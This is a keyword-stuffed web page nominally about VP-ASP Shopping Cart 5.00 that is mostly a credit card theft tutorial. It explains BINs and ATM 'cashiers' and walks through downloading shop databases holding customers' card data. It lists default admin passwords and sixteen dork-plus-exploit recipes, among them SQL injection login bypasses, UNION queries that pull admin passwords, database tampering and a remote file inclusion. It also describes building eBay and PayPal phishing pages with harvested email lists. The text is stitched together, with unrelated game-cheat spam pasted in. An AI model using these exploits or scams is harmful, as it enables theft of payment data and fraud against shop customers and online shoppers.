Vp Asp Shopping Cart 5.00 Software

Posted By admin On 04/08/21
  1. Vp Asp Shopping Cart 5.00 Software Sapiens Audiobook Mp3 Free Download Nissan Ka24de Timing Procedure Crossfire Mac Free Free Kitchen Design Software Download Mindjet Mindmanager 11 Keygen For Mac Nokia 5800 Xpressmusic Software Update Latest Version Free What Is The Newest Version Of Excel The Sims 4 Get Together Cheats.
  2. USA Vp-aasp, December 12, 2015 America's 1 Mail Order Supplier of Temporary Tattoos Argentina Jquery.ui.datepicker.js, December 12, 2015 Adult Education and Training Services USA Saturday, December 12, 2015 Lookers Motorsports Vp-asp shopping cart 5.00 is a new, exciting business that is fast becoming a world class popular automotive accessory.
  3. Pros: My company has been using VPASP Shopping Cart Software for more than 10 years. It has grown from a very good, powerful shopping cart to one which is extremely flexible and provides all functions an online store owner could ever want. Setup and implementation is quite straight forward, using the step by step online installation/upgrade.

A comprehensive ASP shopping cart solution. VP-ASP Shopping Cart 5.0 Version. Gift Certificates: Coupons: Affiliates: Merchant Administration.

This tutorial is divided in two parts.
Introduction into Credit Cards
Credit card Hacking
Note: Hacking credit cards is an illegal act, this is only informational post and I am not responsible for any actions done by you after reading this tutorial. This post is for educational purposes only.
Lets start with some easy terms.
What is credit card ?
Credit cards are of two types:
Debit Card
Credit Card
1. Debit means u have a sum of amount in it and u can use them.
2. Credit means u have a credit line limit like of $10000 and u can use them and by the end of month pay it to bank.
To use a credit card on internet u just not need cc number and expiry but u need many info like :
First name
Last name
Address
City
State
Zip
Country
Phone
CC number
Expiry
CVV2
( this is 3digit security code on backside after signature panel )
If you get that info you can use that to buy any thing on internet, like software license, porn site membership, proxy membership, or any thing (online services usually, like webhosting, domains).
If u want to make money $ through hacking then you need to be very lucky.. you need to have a exact bank and bin to cash that credit card through ATM machines.
Let me explain how ?
First study some simple terms.
BINS = first 6 digit of every credit card is called ' BIN ' (for example cc number is : 4121638430101157 then its bin is ' 412163 '), i hope this is easy to understand.
Now the question is how to make money through credit cards. Its strange.., well you cant do that, but there is specific persons in world who can do that. They call them selves ' cashiers '. You can take some time to find a reliable cashiers.
Now the question is every bank credit cards are cashable and every bin is cashable? Like citibank, bank of america , mbna . are all banks are cashables ? Well answer is ' NO '. If u know some thing, a little thing about banking system, have u ever heard what is ATM machines? Where u withdraw ur cash by putting ur card in.
Every bank don't have ATM, every bank don't support ATM machines cashout. Only few banks support with their few bins (as u know bin is first 6 digit of any credit / debit card number), for suppose bank of america. That bank not have only 1 bin, that bank is assigned like, 412345 412370 are ur bins u can make credit cards on them. So bank divide the country citi location wise, like from 412345 - 412360 is for americans, after that for outsiders and like this. I hope u understand. So all bins of the same bank are even not cashable, like for suppose they support ATM in New York and not in California, so like the bins of California of same bank will be uncashable. So always make sure that the bins and banks are 100% cashable in market by many cashiers.
Be sure cashiers are legit, because many cashiers r there which take your credit card and rip u off and don't send your 50% share back.
You can also find some cashiers on mIRC *( /server irc.unixirc.net:6667 ) channel : #cashout, #ccpower
Well, check the website where u have list of bins and banks mostly 101% cashable. If u get the credit card of the same bank with same bin, then u can cashout otherwise not . Remember for using credit card on internet u don't need PIN ( 4 words password which u enter in ATM Machine ), but for cashout u need. You can get pins only by 2nd method of hacking which i still not post but i will. First method of sql injection and shopadmin hacking don't provide with pins, it only give cc numb cvv2 and other info which usually need for shopping not for cashing.
Credit Card Hacking
CC (Credit Cards) can be hacked by two ways:
Credit Card Scams ( usually used for earning money , some times for shopping )
Credit Card Shopadmin Hacking ( just for fun, knowledge, shopping on internet )
1. Shopadmin Hacking
This method is used for testing the knowledge or for getting the credit card for shopping on internet, or for fun, or any way but not for cashing ( because this method don't give PIN - 4 digit passcode ) only gives cc numb , cvv2 and other basic info.
Shopadmins are of different companies, like: VP-ASP , X CART, etc. This tutorial is for hacking VP-ASP SHOP.
I hope u seen whenever u try to buy some thing on internet with cc, they show u a well programmed form, very secure. They are carts, like vp-asp xcarts. Specific sites are not hacked, but carts are hacked.
Below I'm posting tutorial to hack VP ASP cart. Now every site which use that cart can be hacked, and through their *mdb file u can get their clients 'credit card details', and also login name and password of their admin area, and all other info of clients and comapny secrets.
Lets start:
Type: VP-ASP Shopping Cart
Version: 5.00
How to find VP-ASP 5.00 sites?
Finding VP-ASP 5.00 sites is so simple..
1. Go to google.com and type: VP-ASP Shopping Cart 5.00
2. You will find many websites with VP-ASP 5.00 cart software installed
Now let's go to the exploit.
The page will be like this: ****://***.victim.com/shop/shopdisplaycategories.asp
The exploit is: diag_dbtest.asp
Now you need to do this: ****://***.victim.com/shop/diag_dbtest.asp
A page will appear contain those:
xDatabase
shopping140
xDblocation
resx
xdatabasetypexEmailxEmail NamexEmailSubjectxEmailSy stemxEmailTypexOrdernumbe r
Example:
The most important thing here is xDatabase
xDatabase: shopping140
Ok, now the URL will be like this: ****://***.victim.com/shop/shopping140.mdb
If you didn't download the Database, try this while there is dblocation:
xDblocation
resx
the url will be: ****://***.victim.com/shop/resx/shopping140.mdb
If u see the error message you have to try this :
****://***.victim.com/shop/shopping500.mdb
Download the mdb file and you should be able to open it with any mdb file viewer, you should be able to find one at download.com, or use MS Office Access.
Inside you should be able to find credit card information, and you should even be able to find the admin username and password for the website.
The admin login page is usually located here: ****://***.victim.com/shop/shopadmin.asp
If you cannot find the admin username and password in the mdb file or you can but it is incorrect, or you cannot find the mdb file at all, then try to find the admin login page and enter the default passwords which are:
Username: admin
password: admin
OR
Username: deepdotnet
password: deepdotnet
2. Hacking Through Scams
This method is usually used to hack for earning money. What happens in this method is you create a clone page.
Target: its basically eBay.com or paypal.com for general credit cards, or if u want to target any specific cashable bank like regionbank.com then u have to create a clone page for that bank.
What is eBay.com?
Its a shopping site world wide which is used by many of billion people which use their credit cards on ebay. What you do make a similar page same as eBay and upload it on some hosting which don't have any law restrictions, try to find hosting in Europe they will make your scam up for long time, and email the users of eBay.
How to get the emails of their users?
Go to google.com and type 'Email Harvestor' or any Email Spider and search for eBay Buyers and eBay Sellers and u will get long list. That list is not accurate but out of 1000 atleast 1 email would be valid. Atleast you will get some time.
Well u create a clone page of ebay, and mail the list u create from spider with message, like 'Your account has been hacked' or any reason that looks professional, and ask them to visit the link below and enter your info billing, and the scam page have programming when they enter their info it comes directly to your email.
In the form page u have PIN required so u also get the PIN number through which u can cash through ATM .
Now if u run ebay scam or paypal scam, its up to your luck who's your victim. A client of bank of america or of citibank or of region, its about luck, maybe u get cashable, may be u don't its just luck, nothing else.
Search on google to download a scam site and study it !
After you create your scam site, just find some email harvestor or spider from internet (download good one at Bulk Email Software Superstore - Email Marketing Internet Advertising) and create a good email list.
And you need to find a mailer (mass sending mailer) which send mass - emails to all emails with the message of updating their account on ur scam page ). In from to, use [email protected] and in subject use : eBay - Update Your eBay Account and in Name use eBay
Some Instructions:
1.
Make sure your hosting remains up or the link in the email u will send, and when your victim emails visit it, it will show page cannot be displayed, and your plan will be failed.
2. Hardest point is to find hosting which remains up in scam. even i don't find it easily, its very very hard part.
3. Maybe u have contacts with someone who own hosting company and co locations or dedicated he can hide your scam in some of dedicated without restrictions.
4. Finding a good email list (good means = actually users)
5. Your mass mailing software land the emails in inbox of users

Most of these are outdated but they can still work if you happen to find a vulnerable site:

1:

google dork :–> inurl:”/cart.php?m=”
target looks lile :–> http://xxxxxxx.com/s…cart.php?m=view
exploit: chage cart.php?m=view to /admin
target whit exploit :–> http://xxxxxx.com/store/admin
Usename : ‘or”=”
Password : ‘or”=”

2-

google dork :–> allinurlroddetail.asp?prod=
target looks like :–> http://www.xxxxx.org/proddetail.asp?prod=XXXX (big leters and numbers )
exploit :–> chage the proddtail.asp?prod=SG369 whit fpdb/vsproducts.mdb
target whit exploit :–> http://www.xxxxxx.org/fpdb/vsproducts.mdb

3-

google dork :–> allinurl: /cgi-local/shopper.cgi
target looks like :–> http://www.xxxxxx.co….dd=action&key=
exploit :–> …&template=order.log
target whit exploit :–> http://www.xxxxxxxx….late=order.log

4-

google dork :–> allinurl: Lobby.asp
target looks like :–> http://www.xxxxx.com/mall/lobby.asp
exploit :–> change /mall/lobby.asp to /fpdb/shop.mdb
target whit exploit :–> http://www.xxxxx.com/fpdb/shop.mdb

Township Hack Cheats Tool V4.11 Download Get Unlimited Coins And Cash Check Out: Township Hack Cheats Tool V4.11 Download Full Game HA. Township Hack Cheats Tool V4.11 – Township Hack Pc is an excellent tool for its purpose. This tool will offer you latest features and many extra tricks and tips. All information is included in notes.txt file after you will install file. Township Hack Cheats Tool V4.11 – Township Hack Pc. Township pc cheats hack tool v4.11 download.

5-

google dork :–> allinurl:/vpasp/shopsearch.asp
when u find a target put this in search box
Keyword=&category=5); insert into tbluser (fldusername) values
(”)–&SubCategory=&hide=&action.x=46&action.y=6
Keyword=&category=5); update tbluser set fldpassword=” where
fldusername=”–&SubCategory=All&action.x=33&action.y=6
Keyword=&category=3); update tbluser set fldaccess=’1′ where
fldusername=”–&SubCategory=All&action.x=33&action.y=6
Jangan lupa untuk mengganti dan nya terserah kamu.
Untuk mengganti password admin, masukkan keyword berikut :
Keyword=&category=5); update tbluser set fldpassword=” where
fldusername=’admin’–&SubCategory=All&action.x=33&action.y=6

login page: http://xxxxxxx/vpasp/shopadmin.asp

6-

google dork :–> allinurl:/vpasp/shopdisplayproducts.asp
target looks like :–> http://xxxxxxx.com/v….asp?cat=xxxxxx
exploit :–> http://xxxxxxx.com/vpasp/shopdisplay…20union%20sele ct%20fldauto,fldpassword%20from%20tbluser%20where% 20fldusername=’admin’%20and%20fldpassword%20like%2 0’a%25′-
if this is not working try this ends
%20’a%25′–
%20’b%25′–
%20’c%25′–
after finding user and pass go to login page:
http://xxxx.com/vpasp/shopadmin.asp

7-

google dork :–> allinurl:/shopadmin.asp
target looks like :–> http://www.xxxxxx.com/shopadmin.asp
exploit:
user : ‘or’1
pass : ‘or’1

8-

google.com :–> allinurl:/store/index.cgi/page=
target looks like :–> http://www.xxxxxx.co….short_blue.htm
exploit :–> ./admin/files/order.log
target whit exploit :–> http://www.xxxxxxx.c….iles/order.log

9-

google.com:–> allinurl:/metacart/
target looks like :–> http://www.xxxxxx.com/metacart/about.asp
exploit :–> /database/metacart.mdb
target whit exploit :–> http://www.xxxxxx.com/metacart/database/metacart.mdb

10-

google.com:–> allinurl:/DCShop/
target looks like :–> http://www.xxxxxx.com/xxxx/DCShop/xxxx
exploit :–> /DCShop/orders/orders.txt or /DCShop/Orders/orders.txt
target whit exploit :–> http://www.xxxx.com/xxxx/DCShop/orders/orders.txt or http://www.xxxx.com/xxxx/DCShop/Orders/orders.txt

11-

google.com:–> allinurl:/shop/category.asp/catid=
target looks like :–> http://www.xxxxx.com/shop/category.asp/catid=xxxxxx
exploit :–> /admin/dbsetup.asp
target whit exploit :–> http://www.xxxxxx.com/admin/dbsetup.asp
after geting that page look for dbname and path. (this is also good file sdatapdshoppro.mdb , access.mdb)
target for dl the data base :–> http://www.xxxxxx.com/data/pdshoppro.mdb (dosent need to be like this)
in db look for access to find pass and user of shop admins.

12-

google.com:–> allinurl:/commercesql/
target looks like :–> http://www.xxxxx.com/commercesql/xxxxx
exploit :–> cgi-bin/commercesql/index.cgi?page=
target whit exploit admin config :–> http://www.xxxxxx.co…./admin_conf.pl
target whit exploit admin manager :–> http://www.xxxxxx.co….in/manager.cgi
target whit exploit order.log :–> http://www.xxxxx.com….iles/order.log

Asp

13-

google.com:–> allinurl:/eshop/
target looks like :–> http://www.xxxxx.com/xxxxx/eshop
exploit :–>/cg-bin/eshop/database/order.mdb
target whit exploit :–> http://www.xxxxxx.co….base/order.mdb
after dl the db look at access for user and password

14-

1/search google: allinurl:”shopdisplayproducts.asp?id=
—>http://victim.com/shopdisplayproducts.asp?id=5

2/find error by adding ‘
—>http://victim.com/shopdisplayproducts.asp?id=5′

Vp Asp Shopping Cart 5.00 Software

—>error: Microsoft JET database engine error “80040e14″…./shop$db.asp, line467

-If you don’t see error then change id to cat

—>http://victim.com/shopdisplayproducts.asp?cat=5′

3/if this shop has error then add this: %20union%20select%201%20from%20tbluser”having%201= 1–sp_password

5.00

—>http://victim.com/shopdisplayproduct…on%20select%20 1%20from%20tbluser”having%201=1–sp_password

—>error: 5’ union select 1 from tbluser “having 1=1–sp_password…. The number of column in the two selected tables or queries of a union queries do not match……

4/ add 2,3,4,5,6…….until you see a nice table

add 2
—->http://victim.com/shopdisplayproduct…on%20select%20 1,2%20from%20tbluser”having%201=1–sp_password
then 3
—->http://victim.com/shopdisplayproduct…on%20select%20 1,2,3%20from%20tbluser”having%201=1–sp_password
then 4 —->http://victim.com/shopdisplayproduct…on%20select%20 1,2,3,4%20from%20tbluser”having%201=1–sp_password

…5,6,7,8,9…. untill you see a table. (exp:…47)

—->http://victim.com/shopdisplayproduct…on%20select%20 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 ,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,3 7,38,39,40,41,42,43,44,45,46,47%20from%20tbluser” having%201=1–sp_password
—->see a table.
5/When you see a table, change 4 to fldusername and 22 to fldpassword you will have the admin username and password

—>http://victim.com/shopdisplayproduct…on%20%20elect% 201,2,3,fldusername,5,6,7,8,9,10,11,12,13,14,15,16 ,17,18,19,20,21,fldpassword,23,24,25,26,27,28,29,3 0,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46, 47%20from%20tbluser%22having%201=1–sp_password

6/Find link admin to login:
try this first: http://victim.com/shopadmin.asp
or: http://victim.com/shopadmin.asp
Didn’t work? then u have to find yourself:

add: (for the above example) ‘%20union%20select%201,2,3,fieldvalue,5,6,7,8,9,10 ,11,12,13,14,15,16,17,18,19,20,21,22, 23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39 ,40,41,42,43,44,45,46,47%20from%20configuration”ha ving%201=1–sp_password

—>http://victim.com/shopdisplayproduct…n%20select%201 ,2,3,fieldvalue,5,6,7,8,9,10,11,12,13,14,15,16,17, 18,19,20,21,22, 23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39 ,40,41,42,43,44,45,46,47%20from%20configuration”ha ving%201=1–sp_password
you’ll see something like: ( lot of them)

shopaddmoretocart.asp
shopcheckout.asp
shopdisplaycategories.asp
………….

Vp Asp Credit Card Hack

then guess admin link by adding the above data untill you find admin links

15-

Type: VP-ASP Shopping Cart
Version: 5.00
Dork = intitle:VP-ASP Shopping Cart 5.00
You will find many websites with VP-ASP 5.00 cart software installed
Now let’s get to the exploit.

the page will be like this ****://***.victim.com/shop/shopdisplaycategories.asp
The exploit is : diag_dbtest.asp
so do this:
****://***.victim.com/shop/diag_dbtest.asp

A page will appear with something like:

xDatabase
shopping140

xDblocation
resx

xdatabasetypexEmailxEmailNamexEmailSubjectxEmailSy stemxEmailTypexOrdernumber.:. EXAMPLE .:.
the most important thing here is xDatabase
xDatabase: shopping140
ok now the URL will be like this:
****://***.victim.com/shop/shopping140.mdb
if you didn’t download the Database.
Try this while there is dblocation.
xDblocation
resx

the url will be:
****://***.victim.com/shop/resx/shopping140.mdb
If u see the error message you have to try this :
****://***.victim.com/shop/shopping500.mdb

download the mdb file and you should be able to open it with any mdb file viewer, you should be able to find one at download.com

inside you should be able to find credit card information.
and you should even be able to find the admin username and password for the website.

Vp-asp Shopping Cart 5.00 Software Installed

the admin login page is usually located here
****://***.victim.com/shop/shopadmin.asp

if you cannot find the admin username and password in the mdb file or you can but it is incorrect, or you cannot find the mdb file at all then try to find the admin login page and enter the default passwords which are

Username: admin
password: admin
OR
Username: vpasp
password: vpasp
16-

Sphider Version 1.2.x (include_dir) remote file inclusion

Vp Asp 5.00 Sites

# Sphider Version 1.2.x (include_dir) remote file inclusion
# script Vendor: http://cs.ioc.ee/~ando/sphider/
# Discovered by: IbnuSina
found on index.php
$include_dir = “./include”; <— no patch here
$language_dir = “./languages”;
include “$include_dir/index_header.inc”;
include “$include_dir/conf.php”;
include “$include_dir/connect.php”;

Finding Vp Asp 5.00 Sites

exploitz : http://targe.lu/%5Bsphiderpath%5D/index.php?include_dir=injekan.lu